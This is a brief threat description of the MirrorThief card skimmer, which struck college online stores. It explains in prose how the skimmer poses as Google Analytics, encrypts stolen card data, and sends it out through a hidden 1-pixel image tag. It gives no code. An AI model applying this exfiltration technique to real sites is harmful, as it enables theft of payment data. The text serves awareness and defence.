MirrorThief Card Skimmer Description
Card-skimming operations are nothing new in the world of cybercrime. Shady individuals have been carrying out such attacks for years. They would collect credit card information and then sell it on the Deep Web or various hacking sites. Recently, it was reported that a total of 201 US and Canadian college online stores had been a victim of a card-skimming attack.
The MirrorThief Card Skimmer manages to stay under the radar by mimicking the Google Analytics service. The attackers had even gone as far as to create a domain for their threat that is meant to resemble the legitimate Google Analytics website closely.
The skimmed payment details are stored into a JSON file. To secure the file, the attackers use AES encryption and base64 encoding before beginning the transfer. The skimmer's code will then create an HTML image tag on the compromised server that contains an URL to the attacker’s server, as well as additional parameters that are used to append the encrypted JSON file. The image.tag itself works with a 1-pixel image so that it is impossible to notice it without taking a very close look at the page's source code.
These attacks are not uncommon, and online stores need to follow the latest cybersecurity trends to ensure the safety of their customers as this is their responsibility entirely.